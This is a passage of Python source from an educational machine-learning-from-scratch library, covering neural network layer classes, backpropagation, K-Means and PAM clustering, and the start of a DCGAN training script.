Update weights self._backward_pass(loss_grad=loss_grad) return loss, acc def fit(self, X, y, n_epochs, batch_size): """ Trains the model for a fixed number of epochs """ for _ in self.progressbar(range(n_epochs)): batch_error = [] for X_batch, y_batch in batch_iterator(X, y, batch_size=batch_size): loss, _ = self.train_on_batch(X_batch, y_batch) batch_error.append(loss) self.errors["training"].append(np.mean(batch_error)) if self.val_set is not None: val_loss, _ = self.test_on_batch(self.val_set["X"], self.val_set["y"]) self.errors["validation"].append(val_loss) return self.errors["training"], self.errors["validation"] def _forward_pass(self, X, training=True): """ Calculate the output of the NN """ layer_output = X for layer in self.layers: layer_output = layer.forward_pass(layer_output, training) return layer_output def _backward_pass(self, loss_grad): """ Propagate the gradient 'backwards' and update the weights in each layer """ for layer in reversed(self.layers): loss_grad = layer.backward_pass(loss_grad) def summary(self, name="Model Summary"): # Print model name print (AsciiTable([[name]]).table) # Network input shape (first layer's input shape) print ("Input Shape: %s" % str(self.layers[0].input_shape)) # Iterate through network and get each layer's configuration table_data = [["Layer Type", "Parameters", "Output Shape"]] tot_params = 0 for layer in self.layers: layer_name = layer.layer_name() params = layer.parameters() out_shape = layer.output_shape() table_data.append([layer_name, str(params), str(out_shape)]) tot_params += params # Print network configuration table print (AsciiTable(table_data).table) print ("Total Parameters: %d\n" % tot_params) def predict(self, X): """ Use the trained model to predict labels of X """ return self._forward_pass(X, training=False) File: mlfromscratch/deep_learning/layers.py from __future__ import print_function, division import math import numpy as np import copy from mlfromscratch.deep_learning.activation_functions import Sigmoid, ReLU, SoftPlus, LeakyReLU from mlfromscratch.deep_learning.activation_functions import TanH, ELU, SELU, Softmax class Layer(object): def set_input_shape(self, shape): """ Sets the shape that the layer expects of the input in the forward pass method """ self.input_shape = shape def layer_name(self): """ The name of the layer. Used in model summary. """ return self.__class__.__name__ def parameters(self): """ The number of trainable parameters used by the layer """ return 0 def forward_pass(self, X, training): """ Propogates the signal forward in the network """ raise NotImplementedError() def backward_pass(self, accum_grad): """ Propogates the accumulated gradient backwards in the network. If the has trainable weights then these weights are also tuned in this method. As input (accum_grad) it receives the gradient with respect to the output of the layer and returns the gradient with respect to the output of the previous layer. """ raise NotImplementedError() def output_shape(self): """ The shape of the output produced by forward_pass """ raise NotImplementedError() class Dense(Layer): """A fully-connected NN layer. Parameters: ----------- n_units: int The number of neurons in the layer. input_shape: tuple The expected input shape of the layer. For dense layers a single digit specifying the number of features of the input. Must be specified if it is the first layer in the network. 
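    Example (illustrative):
        Dense(n_units=64, input_shape=(100,)) maps a (batch_size, 100) input to a
        (batch_size, 64) output by computing X.dot(W) + w0 in the forward pass.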
""" def __init__(self, n_units, input_shape=None): self.layer_input = None self.input_shape = input_shape self.n_units = n_units self.trainable = True self.W = None self.w0 = None def initialize(self, optimizer): # Initialize the weights limit = 1 / math.sqrt(self.input_shape[0]) self.W = np.random.uniform(-limit, limit, (self.input_shape[0], self.n_units)) self.w0 = np.zeros((1, self.n_units)) # Weight optimizers self.W_opt = copy.copy(optimizer) self.w0_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.w0.shape) def forward_pass(self, X, training=True): self.layer_input = X return X.dot(self.W) + self.w0 def backward_pass(self, accum_grad): # Save weights used during forwards pass W = self.W if self.trainable: # Calculate gradient w.r.t layer weights grad_w = self.layer_input.T.dot(accum_grad) grad_w0 = np.sum(accum_grad, axis=0, keepdims=True) # Update the layer weights self.W = self.W_opt.update(self.W, grad_w) self.w0 = self.w0_opt.update(self.w0, grad_w0) # Return accumulated gradient for next layer # Calculated based on the weights used during the forward pass accum_grad = accum_grad.dot(W.T) return accum_grad def output_shape(self): return (self.n_units, ) class RNN(Layer): """A Vanilla Fully-Connected Recurrent Neural Network layer. Parameters: ----------- n_units: int The number of hidden states in the layer. activation: string The name of the activation function which will be applied to the output of each state. bptt_trunc: int Decides how many time steps the gradient should be propagated backwards through states given the loss gradient for time step t. input_shape: tuple The expected input shape of the layer. For dense layers a single digit specifying the number of features of the input. Must be specified if it is the first layer in the network. Reference: http://www.wildml.com/2015/09/recurrent-neural-networks-tutorial-part-2-implementing-a-language-model-rnn-with-python-numpy-and-theano/ """ def __init__(self, n_units, activation='tanh', bptt_trunc=5, input_shape=None): self.input_shape = input_shape self.n_units = n_units self.activation = activation_functions[activation]() self.trainable = True self.bptt_trunc = bptt_trunc self.W = None # Weight of the previous state self.V = None # Weight of the output self.U = None # Weight of the input def initialize(self, optimizer): timesteps, input_dim = self.input_shape # Initialize the weights limit = 1 / math.sqrt(input_dim) self.U = np.random.uniform(-limit, limit, (self.n_units, input_dim)) limit = 1 / math.sqrt(self.n_units) self.V = np.random.uniform(-limit, limit, (input_dim, self.n_units)) self.W = np.random.uniform(-limit, limit, (self.n_units, self.n_units)) # Weight optimizers self.U_opt = copy.copy(optimizer) self.V_opt = copy.copy(optimizer) self.W_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.U.shape) + np.prod(self.V.shape) def forward_pass(self, X, training=True): self.layer_input = X batch_size, timesteps, input_dim = X.shape # Save these values for use in backprop. 
self.state_input = np.zeros((batch_size, timesteps, self.n_units)) self.states = np.zeros((batch_size, timesteps+1, self.n_units)) self.outputs = np.zeros((batch_size, timesteps, input_dim)) # Set last time step to zero for calculation of the state_input at time step zero self.states[:, -1] = np.zeros((batch_size, self.n_units)) for t in range(timesteps): # Input to state_t is the current input and output of previous states self.state_input[:, t] = X[:, t].dot(self.U.T) + self.states[:, t-1].dot(self.W.T) self.states[:, t] = self.activation(self.state_input[:, t]) self.outputs[:, t] = self.states[:, t].dot(self.V.T) return self.outputs def backward_pass(self, accum_grad): _, timesteps, _ = accum_grad.shape # Variables where we save the accumulated gradient w.r.t each parameter grad_U = np.zeros_like(self.U) grad_V = np.zeros_like(self.V) grad_W = np.zeros_like(self.W) # The gradient w.r.t the layer input. # Will be passed on to the previous layer in the network accum_grad_next = np.zeros_like(accum_grad) # Back Propagation Through Time for t in reversed(range(timesteps)): # Update gradient w.r.t V at time step t grad_V += accum_grad[:, t].T.dot(self.states[:, t]) # Calculate the gradient w.r.t the state input grad_wrt_state = accum_grad[:, t].dot(self.V) * self.activation.gradient(self.state_input[:, t]) # Gradient w.r.t the layer input accum_grad_next[:, t] = grad_wrt_state.dot(self.U) # Update gradient w.r.t W and U by backprop. from time step t for at most # self.bptt_trunc number of time steps for t_ in reversed(np.arange(max(0, t - self.bptt_trunc), t+1)): grad_U += grad_wrt_state.T.dot(self.layer_input[:, t_]) grad_W += grad_wrt_state.T.dot(self.states[:, t_-1]) # Calculate gradient w.r.t previous state grad_wrt_state = grad_wrt_state.dot(self.W) * self.activation.gradient(self.state_input[:, t_-1]) # Update weights self.U = self.U_opt.update(self.U, grad_U) self.V = self.V_opt.update(self.V, grad_V) self.W = self.W_opt.update(self.W, grad_W) return accum_grad_next def output_shape(self): return self.input_shape class Conv2D(Layer): """A 2D Convolution Layer. Parameters: ----------- n_filters: int The number of filters that will convolve over the input matrix. The number of channels of the output shape. filter_shape: tuple A tuple (filter_height, filter_width). input_shape: tuple The shape of the expected input of the layer. (batch_size, channels, height, width) Only needs to be specified for first layer in the network. padding: string Either 'same' or 'valid'. 'same' results in padding being added so that the output height and width matches the input height and width. For 'valid' no padding is added. stride: int The stride length of the filters during the convolution over the input. 
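    Example (illustrative):
        Conv2D(n_filters=16, filter_shape=(3, 3), input_shape=(1, 28, 28),
        padding='same', stride=1) maps a (batch_size, 1, 28, 28) input to an
        output of shape (batch_size, 16, 28, 28).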
""" def __init__(self, n_filters, filter_shape, input_shape=None, padding='same', stride=1): self.n_filters = n_filters self.filter_shape = filter_shape self.padding = padding self.stride = stride self.input_shape = input_shape self.trainable = True def initialize(self, optimizer): # Initialize the weights filter_height, filter_width = self.filter_shape channels = self.input_shape[0] limit = 1 / math.sqrt(np.prod(self.filter_shape)) self.W = np.random.uniform(-limit, limit, size=(self.n_filters, channels, filter_height, filter_width)) self.w0 = np.zeros((self.n_filters, 1)) # Weight optimizers self.W_opt = copy.copy(optimizer) self.w0_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.W.shape) + np.prod(self.w0.shape) def forward_pass(self, X, training=True): batch_size, channels, height, width = X.shape self.layer_input = X # Turn image shape into column shape # (enables dot product between input and weights) self.X_col = image_to_column(X, self.filter_shape, stride=self.stride, output_shape=self.padding) # Turn weights into column shape self.W_col = self.W.reshape((self.n_filters, -1)) # Calculate output output = self.W_col.dot(self.X_col) + self.w0 # Reshape into (n_filters, out_height, out_width, batch_size) output = output.reshape(self.output_shape() + (batch_size, )) # Redistribute axises so that batch size comes first return output.transpose(3,0,1,2) def backward_pass(self, accum_grad): # Reshape accumulated gradient into column shape accum_grad = accum_grad.transpose(1, 2, 3, 0).reshape(self.n_filters, -1) if self.trainable: # Take dot product between column shaped accum. gradient and column shape # layer input to determine the gradient at the layer with respect to layer weights grad_w = accum_grad.dot(self.X_col.T).reshape(self.W.shape) # The gradient with respect to bias terms is the sum similarly to in Dense layer grad_w0 = np.sum(accum_grad, axis=1, keepdims=True) # Update the layers weights self.W = self.W_opt.update(self.W, grad_w) self.w0 = self.w0_opt.update(self.w0, grad_w0) # Recalculate the gradient which will be propogated back to prev. layer accum_grad = self.W_col.T.dot(accum_grad) # Reshape from column shape to image shape accum_grad = column_to_image(accum_grad, self.layer_input.shape, self.filter_shape, stride=self.stride, output_shape=self.padding) return accum_grad def output_shape(self): channels, height, width = self.input_shape pad_h, pad_w = determine_padding(self.filter_shape, output_shape=self.padding) output_height = (height + np.sum(pad_h) - self.filter_shape[0]) / self.stride + 1 output_width = (width + np.sum(pad_w) - self.filter_shape[1]) / self.stride + 1 return self.n_filters, int(output_height), int(output_width) class BatchNormalization(Layer): """Batch normalization. 
""" def __init__(self, momentum=0.99): self.momentum = momentum self.trainable = True self.eps = 0.01 self.running_mean = None self.running_var = None def initialize(self, optimizer): # Initialize the parameters self.gamma = np.ones(self.input_shape) self.beta = np.zeros(self.input_shape) # parameter optimizers self.gamma_opt = copy.copy(optimizer) self.beta_opt = copy.copy(optimizer) def parameters(self): return np.prod(self.gamma.shape) + np.prod(self.beta.shape) def forward_pass(self, X, training=True): # Initialize running mean and variance if first run if self.running_mean is None: self.running_mean = np.mean(X, axis=0) self.running_var = np.var(X, axis=0) if training and self.trainable: mean = np.mean(X, axis=0) var = np.var(X, axis=0) self.running_mean = self.momentum * self.running_mean + (1 - self.momentum) * mean self.running_var = self.momentum * self.running_var + (1 - self.momentum) * var else: mean = self.running_mean var = self.running_var # Statistics saved for backward pass self.X_centered = X - mean self.stddev_inv = 1 / np.sqrt(var + self.eps) X_norm = self.X_centered * self.stddev_inv output = self.gamma * X_norm + self.beta return output def backward_pass(self, accum_grad): # Save parameters used during the forward pass gamma = self.gamma # If the layer is trainable the parameters are updated if self.trainable: X_norm = self.X_centered * self.stddev_inv grad_gamma = np.sum(accum_grad * X_norm, axis=0) grad_beta = np.sum(accum_grad, axis=0) self.gamma = self.gamma_opt.update(self.gamma, grad_gamma) self.beta = self.beta_opt.update(self.beta, grad_beta) batch_size = accum_grad.shape[0] # The gradient of the loss with respect to the layer inputs (use weights and statistics from forward pass) accum_grad = (1 / batch_size) * gamma * self.stddev_inv * ( batch_size * accum_grad - np.sum(accum_grad, axis=0) - self.X_centered * self.stddev_inv**2 * np.sum(accum_grad * self.X_centered, axis=0) ) return accum_grad def output_shape(self): return self.input_shape class PoolingLayer(Layer): """A parent class of MaxPooling2D and AveragePooling2D """ def __init__(self, pool_shape=(2, 2), stride=1, padding=0): self.pool_shape = pool_shape self.stride = stride self.padding = padding self.trainable = True def forward_pass(self, X, training=True): self.layer_input = X batch_size, channels, height, width = X.shape _, out_height, out_width = self.output_shape() X = X.reshape(batch_size*channels, 1, height, width) X_col = image_to_column(X, self.pool_shape, self.stride, self.padding) # MaxPool or AveragePool specific method output = self._pool_forward(X_col) output = output.reshape(out_height, out_width, batch_size, channels) output = output.transpose(2, 3, 0, 1) return output def backward_pass(self, accum_grad): batch_size, _, _, _ = accum_grad.shape channels, height, width = self.input_shape accum_grad = accum_grad.transpose(2, 3, 0, 1).ravel() # MaxPool or AveragePool specific method accum_grad_col = self._pool_backward(accum_grad) accum_grad = column_to_image(accum_grad_col, (batch_size * channels, 1, height, width), self.pool_shape, self.stride, 0) accum_grad = accum_grad.reshape((batch_size,) + self.input_shape) return accum_grad def output_shape(self): channels, height, width = self.input_shape out_height = (height - self.pool_shape[0]) / self.stride + 1 out_width = (width - self.pool_shape[1]) / self.stride + 1 assert out_height % 1 == 0 assert out_width % 1 == 0 return channels, int(out_height), int(out_width) class MaxPooling2D(PoolingLayer): def _pool_forward(self, X_col): arg_max 
= np.argmax(X_col, axis=0).flatten() output = X_col[arg_max, range(arg_max.size)] self.cache = arg_max return output def _pool_backward(self, accum_grad): accum_grad_col = np.zeros((np.prod(self.pool_shape), accum_grad.size)) arg_max = self.cache accum_grad_col[arg_max, range(accum_grad.size)] = accum_grad return accum_grad_col class AveragePooling2D(PoolingLayer): def _pool_forward(self, X_col): output = np.mean(X_col, axis=0) return output def _pool_backward(self, accum_grad): accum_grad_col = np.zeros((np.prod(self.pool_shape), accum_grad.size)) accum_grad_col[:, range(accum_grad.size)] = 1. / accum_grad_col.shape[0] * accum_grad return accum_grad_col class ConstantPadding2D(Layer): """Adds rows and columns of constant values to the input. Expects the input to be of shape (batch_size, channels, height, width) Parameters: ----------- padding: tuple The amount of padding along the height and width dimension of the input. If (pad_h, pad_w) the same symmetric padding is applied along height and width dimension. If ((pad_h0, pad_h1), (pad_w0, pad_w1)) the specified padding is added to beginning and end of the height and width dimension. padding_value: int or tuple The value the is added as padding. """ def __init__(self, padding, padding_value=0): self.padding = padding self.trainable = True if not isinstance(padding[0], tuple): self.padding = ((padding[0], padding[0]), padding[1]) if not isinstance(padding[1], tuple): self.padding = (self.padding[0], (padding[1], padding[1])) self.padding_value = padding_value def forward_pass(self, X, training=True): output = np.pad(X, pad_width=((0,0), (0,0), self.padding[0], self.padding[1]), mode="constant", constant_values=self.padding_value) return output def backward_pass(self, accum_grad): pad_top, pad_left = self.padding[0][0], self.padding[1][0] height, width = self.input_shape[1], self.input_shape[2] accum_grad = accum_grad[:, :, pad_top:pad_top+height, pad_left:pad_left+width] return accum_grad def output_shape(self): new_height = self.input_shape[1] + np.sum(self.padding[0]) new_width = self.input_shape[2] + np.sum(self.padding[1]) return (self.input_shape[0], new_height, new_width) class ZeroPadding2D(ConstantPadding2D): """Adds rows and columns of zero values to the input. Expects the input to be of shape (batch_size, channels, height, width) Parameters: ----------- padding: tuple The amount of padding along the height and width dimension of the input. If (pad_h, pad_w) the same symmetric padding is applied along height and width dimension. If ((pad_h0, pad_h1), (pad_w0, pad_w1)) the specified padding is added to beginning and end of the height and width dimension. """ def __init__(self, padding): self.padding = padding if isinstance(padding[0], int): self.padding = ((padding[0], padding[0]), padding[1]) if isinstance(padding[1], int): self.padding = (self.padding[0], (padding[1], padding[1])) self.padding_value = 0 class Flatten(Layer): """ Turns a multidimensional matrix into two-dimensional """ def __init__(self, input_shape=None): self.prev_shape = None self.trainable = True self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape return X.reshape((X.shape[0], -1)) def backward_pass(self, accum_grad): return accum_grad.reshape(self.prev_shape) def output_shape(self): return (np.prod(self.input_shape),) class UpSampling2D(Layer): """ Nearest neighbor up sampling of the input. Repeats the rows and columns of the data by size[0] and size[1] respectively. 
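    For example (illustrative), with size=(2, 2) an input of shape
    (batch_size, channels, height, width) is up sampled to
    (batch_size, channels, 2 * height, 2 * width).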
Parameters: ----------- size: tuple (size_y, size_x) - The number of times each axis will be repeated. """ def __init__(self, size=(2,2), input_shape=None): self.prev_shape = None self.trainable = True self.size = size self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape # Repeat each axis as specified by size X_new = X.repeat(self.size[0], axis=2).repeat(self.size[1], axis=3) return X_new def backward_pass(self, accum_grad): # Down sample input to previous shape accum_grad = accum_grad[:, :, ::self.size[0], ::self.size[1]] return accum_grad def output_shape(self): channels, height, width = self.input_shape return channels, self.size[0] * height, self.size[1] * width class Reshape(Layer): """ Reshapes the input tensor into specified shape Parameters: ----------- shape: tuple The shape which the input shall be reshaped to. """ def __init__(self, shape, input_shape=None): self.prev_shape = None self.trainable = True self.shape = shape self.input_shape = input_shape def forward_pass(self, X, training=True): self.prev_shape = X.shape return X.reshape((X.shape[0], ) + self.shape) def backward_pass(self, accum_grad): return accum_grad.reshape(self.prev_shape) def output_shape(self): return self.shape class Dropout(Layer): """A layer that randomly sets a fraction p of the output units of the previous layer to zero. Parameters: ----------- p: float The probability that unit x is set to zero. """ def __init__(self, p=0.2): self.p = p self._mask = None self.input_shape = None self.n_units = None self.pass_through = True self.trainable = True def forward_pass(self, X, training=True): c = (1 - self.p) if training: self._mask = np.random.uniform(size=X.shape) > self.p c = self._mask return X * c def backward_pass(self, accum_grad): return accum_grad * self._mask def output_shape(self): return self.input_shape activation_functions = { 'relu': ReLU, 'sigmoid': Sigmoid, 'selu': SELU, 'elu': ELU, 'softmax': Softmax, 'leaky_relu': LeakyReLU, 'tanh': TanH, 'softplus': SoftPlus } class Activation(Layer): """A layer that applies an activation operation to the input. Parameters: ----------- name: string The name of the activation function that will be used. """ def __init__(self, name): self.activation_name = name self.activation_func = activation_functions[name]() self.trainable = True def layer_name(self): return "Activation (%s)" % (self.activation_func.__class__.__name__) def forward_pass(self, X, training=True): self.layer_input = X return self.activation_func(X) def backward_pass(self, accum_grad): return accum_grad * self.activation_func.gradient(self.layer_input) def output_shape(self): return self.input_shape # Method which calculates the padding based on the specified output shape and the # shape of the filters def determine_padding(filter_shape, output_shape="same"): # No padding if output_shape == "valid": return (0, 0), (0, 0) # Pad so that the output shape is the same as input shape (given that stride=1) elif output_shape == "same": filter_height, filter_width = filter_shape # Derived from: # output_height = (height + pad_h - filter_height) / stride + 1 # In this case output_height = height and stride = 1. This gives the # expression for the padding below. 
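    # Illustrative check with assumed values: a filter height of 3 gives
    # pad_h1 = floor(2 / 2) = 1 and pad_h2 = ceil(2 / 2) = 1 (one row of
    # padding on each side), while an even filter height of 2 gives
    # (pad_h1, pad_h2) = (0, 1), so the extra row goes at the bottom.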
pad_h1 = int(math.floor((filter_height - 1)/2)) pad_h2 = int(math.ceil((filter_height - 1)/2)) pad_w1 = int(math.floor((filter_width - 1)/2)) pad_w2 = int(math.ceil((filter_width - 1)/2)) return (pad_h1, pad_h2), (pad_w1, pad_w2) # Reference: CS231n Stanford def get_im2col_indices(images_shape, filter_shape, padding, stride=1): # First figure out what the size of the output should be batch_size, channels, height, width = images_shape filter_height, filter_width = filter_shape pad_h, pad_w = padding out_height = int((height + np.sum(pad_h) - filter_height) / stride + 1) out_width = int((width + np.sum(pad_w) - filter_width) / stride + 1) i0 = np.repeat(np.arange(filter_height), filter_width) i0 = np.tile(i0, channels) i1 = stride * np.repeat(np.arange(out_height), out_width) j0 = np.tile(np.arange(filter_width), filter_height * channels) j1 = stride * np.tile(np.arange(out_width), out_height) i = i0.reshape(-1, 1) + i1.reshape(1, -1) j = j0.reshape(-1, 1) + j1.reshape(1, -1) k = np.repeat(np.arange(channels), filter_height * filter_width).reshape(-1, 1) return (k, i, j) # Method which turns the image shaped input to column shape. # Used during the forward pass. # Reference: CS231n Stanford def image_to_column(images, filter_shape, stride, output_shape='same'): filter_height, filter_width = filter_shape pad_h, pad_w = determine_padding(filter_shape, output_shape) # Add padding to the image images_padded = np.pad(images, ((0, 0), (0, 0), pad_h, pad_w), mode='constant') # Calculate the indices where the dot products are to be applied between weights # and the image k, i, j = get_im2col_indices(images.shape, filter_shape, (pad_h, pad_w), stride) # Get content from image at those indices cols = images_padded[:, k, i, j] channels = images.shape[1] # Reshape content into column shape cols = cols.transpose(1, 2, 0).reshape(filter_height * filter_width * channels, -1) return cols # Method which turns the column shaped input to image shape. # Used during the backward pass. # Reference: CS231n Stanford def column_to_image(cols, images_shape, filter_shape, stride, output_shape='same'): batch_size, channels, height, width = images_shape pad_h, pad_w = determine_padding(filter_shape, output_shape) height_padded = height + np.sum(pad_h) width_padded = width + np.sum(pad_w) images_padded = np.zeros((batch_size, channels, height_padded, width_padded)) # Calculate the indices where the dot products are applied between weights # and the image k, i, j = get_im2col_indices(images_shape, filter_shape, (pad_h, pad_w), stride) cols = cols.reshape(channels * np.prod(filter_shape), -1, batch_size) cols = cols.transpose(2, 0, 1) # Add column content to the images at the indices np.add.at(images_padded, (slice(None), k, i, j), cols) # Return image without padding return images_padded[:, :, pad_h[0]:height+pad_h[0], pad_w[0]:width+pad_w[0]] File: mlfromscratch/unsupervised_learning/k_means.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, Plot from mlfromscratch.unsupervised_learning import * class KMeans(): """A simple clustering method that forms k clusters by iteratively reassigning samples to the closest centroids and after that moves the centroids to the center of the new formed clusters. Parameters: ----------- k: int The number of clusters the algorithm will form. max_iterations: int The number of iterations the algorithm will run for if it does not converge before that. 
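    Example (an illustrative sketch; the synthetic two-blob data below is assumed):

        import numpy as np
        X = np.vstack([np.random.randn(50, 2), np.random.randn(50, 2) + 5])
        labels = KMeans(k=2, max_iterations=100).predict(X)
        labels.shape   # -> (100,), one cluster index per sample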
""" def __init__(self, k=2, max_iterations=500): self.k = k self.max_iterations = max_iterations def _init_random_centroids(self, X): """ Initialize the centroids as k random samples of X""" n_samples, n_features = np.shape(X) centroids = np.zeros((self.k, n_features)) for i in range(self.k): centroid = X[np.random.choice(range(n_samples))] centroids[i] = centroid return centroids def _closest_centroid(self, sample, centroids): """ Return the index of the closest centroid to the sample """ closest_i = 0 closest_dist = float('inf') for i, centroid in enumerate(centroids): distance = euclidean_distance(sample, centroid) if distance < closest_dist: closest_i = i closest_dist = distance return closest_i def _create_clusters(self, centroids, X): """ Assign the samples to the closest centroids to create clusters """ n_samples = np.shape(X)[0] clusters = [[] for _ in range(self.k)] for sample_i, sample in enumerate(X): centroid_i = self._closest_centroid(sample, centroids) clusters[centroid_i].append(sample_i) return clusters def _calculate_centroids(self, clusters, X): """ Calculate new centroids as the means of the samples in each cluster """ n_features = np.shape(X)[1] centroids = np.zeros((self.k, n_features)) for i, cluster in enumerate(clusters): centroid = np.mean(X[cluster], axis=0) centroids[i] = centroid return centroids def _get_cluster_labels(self, clusters, X): """ Classify samples as the index of their clusters """ # One prediction for each sample y_pred = np.zeros(np.shape(X)[0]) for cluster_i, cluster in enumerate(clusters): for sample_i in cluster: y_pred[sample_i] = cluster_i return y_pred def predict(self, X): """ Do K-Means clustering and return cluster indices """ # Initialize centroids as k random samples from X centroids = self._init_random_centroids(X) # Iterate until convergence or for max iterations for _ in range(self.max_iterations): # Assign samples to closest centroids (create clusters) clusters = self._create_clusters(centroids, X) # Save current centroids for convergence check prev_centroids = centroids # Calculate new centroids from the clusters centroids = self._calculate_centroids(clusters, X) # If no centroids have changed => convergence diff = centroids - prev_centroids if not diff.any(): break return self._get_cluster_labels(clusters, X) File: mlfromscratch/unsupervised_learning/partitioning_around_medoids.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import normalize, euclidean_distance, Plot from mlfromscratch.unsupervised_learning import PCA class PAM(): """A simple clustering method that forms k clusters by first assigning samples to the closest medoids, and then swapping medoids with non-medoid samples if the total distance (cost) between the cluster members and their medoid is smaller than prevoisly. Parameters: ----------- k: int The number of clusters the algorithm will form. 
""" def __init__(self, k=2): self.k = k def _init_random_medoids(self, X): """ Initialize the medoids as random samples """ n_samples, n_features = np.shape(X) medoids = np.zeros((self.k, n_features)) for i in range(self.k): medoid = X[np.random.choice(range(n_samples))] medoids[i] = medoid return medoids def _closest_medoid(self, sample, medoids): """ Return the index of the closest medoid to the sample """ closest_i = None closest_distance = float("inf") for i, medoid in enumerate(medoids): distance = euclidean_distance(sample, medoid) if distance < closest_distance: closest_i = i closest_distance = distance return closest_i def _create_clusters(self, X, medoids): """ Assign the samples to the closest medoids to create clusters """ clusters = [[] for _ in range(self.k)] for sample_i, sample in enumerate(X): medoid_i = self._closest_medoid(sample, medoids) clusters[medoid_i].append(sample_i) return clusters def _calculate_cost(self, X, clusters, medoids): """ Calculate the cost (total distance between samples and their medoids) """ cost = 0 # For each cluster for i, cluster in enumerate(clusters): medoid = medoids[i] for sample_i in cluster: # Add distance between sample and medoid as cost cost += euclidean_distance(X[sample_i], medoid) return cost def _get_non_medoids(self, X, medoids): """ Returns a list of all samples that are not currently medoids """ non_medoids = [] for sample in X: if not sample in medoids: non_medoids.append(sample) return non_medoids def _get_cluster_labels(self, clusters, X): """ Classify samples as the index of their clusters """ # One prediction for each sample y_pred = np.zeros(np.shape(X)[0]) for cluster_i in range(len(clusters)): cluster = clusters[cluster_i] for sample_i in cluster: y_pred[sample_i] = cluster_i return y_pred def predict(self, X): """ Do Partitioning Around Medoids and return the cluster labels """ # Initialize medoids randomly medoids = self._init_random_medoids(X) # Assign samples to closest medoids clusters = self._create_clusters(X, medoids) # Calculate the initial cost (total distance between samples and # corresponding medoids) cost = self._calculate_cost(X, clusters, medoids) # Iterate until we no longer have a cheaper cost while True: best_medoids = medoids lowest_cost = cost for medoid in medoids: # Get all non-medoid samples non_medoids = self._get_non_medoids(X, medoids) # Calculate the cost when swapping medoid and samples for sample in non_medoids: # Swap sample with the medoid new_medoids = medoids.copy() new_medoids[medoids == medoid] = sample # Assign samples to new medoids new_clusters = self._create_clusters(X, new_medoids) # Calculate the cost with the new set of medoids new_cost = self._calculate_cost( X, new_clusters, new_medoids) # If the swap gives us a lower cost we save the medoids and cost if new_cost < lowest_cost: lowest_cost = new_cost best_medoids = new_medoids # If there was a swap that resultet in a lower cost we save the # resulting medoids from the best swap and the new cost if lowest_cost < cost: cost = lowest_cost medoids = best_medoids # Else finished else: break final_clusters = self._create_clusters(X, medoids) # Return the samples cluster indices as labels return self._get_cluster_labels(final_clusters, X) File: mlfromscratch/unsupervised_learning/__init__.py from .principal_component_analysis import PCA from .apriori import Apriori from .dbscan import DBSCAN from .fp_growth import FPGrowth from .gaussian_mixture_model import GaussianMixtureModel from .genetic_algorithm import GeneticAlgorithm from 
.k_means import KMeans from .partitioning_around_medoids import PAM from .restricted_boltzmann_machine import RBM File: mlfromscratch/unsupervised_learning/dcgan.py from __future__ import print_function, division import matplotlib.pyplot as plt import numpy as np import progressbar from sklearn.datasets import fetch_mldata from mlfromscratch.deep_learning.optimizers import Adam from mlfromscratch.deep_learning.loss_functions import CrossEntropy from mlfromscratch.deep_learning.layers import Dense, Dropout, Flatten, Activation, Reshape, BatchNormalization, ZeroPadding2D, Conv2D, UpSampling2D from mlfromscratch.deep_learning import NeuralNetwork class DCGAN(): def __init__(self): self.img_rows = 28 self.img_cols = 28 self.channels = 1 self.img_shape = (self.channels, self.img_rows, self.img_cols) self.latent_dim = 100 optimizer = Adam(learning_rate=0.0002, b1=0.5) loss_function = CrossEntropy # Build the discriminator self.discriminator = self.build_discriminator(optimizer, loss_function) # Build the generator self.generator = self.build_generator(optimizer, loss_function) # Build the combined model self.combined = NeuralNetwork(optimizer=optimizer, loss=loss_function) self.combined.layers.extend(self.generator.layers) self.combined.layers.extend(self.discriminator.layers) print () self.generator.summary(name="Generator") self.discriminator.summary(name="Discriminator") def build_generator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Dense(128 * 7 * 7, input_shape=(100,))) model.add(Activation('leaky_relu')) model.add(Reshape((128, 7, 7))) model.add(BatchNormalization(momentum=0.8)) model.add(UpSampling2D()) model.add(Conv2D(128, filter_shape=(3,3), padding='same')) model.add(Activation("leaky_relu")) model.add(BatchNormalization(momentum=0.8)) model.add(UpSampling2D()) model.add(Conv2D(64, filter_shape=(3,3), padding='same')) model.add(Activation("leaky_relu")) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(1, filter_shape=(3,3), padding='same')) model.add(Activation("tanh")) return model def build_discriminator(self, optimizer, loss_function): model = NeuralNetwork(optimizer=optimizer, loss=loss_function) model.add(Conv2D(32, filter_shape=(3,3), stride=2, input_shape=self.img_shape, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(Conv2D(64, filter_shape=(3,3), stride=2, padding='same')) model.add(ZeroPadding2D(padding=((0,1),(0,1)))) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(128, filter_shape=(3,3), stride=2, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(BatchNormalization(momentum=0.8)) model.add(Conv2D(256, filter_shape=(3,3), stride=1, padding='same')) model.add(Activation('leaky_relu')) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(2)) model.add(Activation('softmax')) return model def train(self, epochs, batch_size=128, save_interval=50): mnist = fetch_mldata('MNIST original') X = mnist.data.reshape((-1,) + self.img_shape) y = mnist.target # Rescale -1 to 1 X = (X.astype(np.float32) - 127.5) / 127.5 half_batch = int(batch_size / 2) for epoch in range(epochs): # --------------------- # Train Discriminator # --------------------- self.discriminator.set_trainable(True) # Select a random half batch of images idx = np.random.randint(0, X.shape[0], half_batch) imgs = X[idx] # Sample noise to use as generator input noise = np.random.normal(0, 
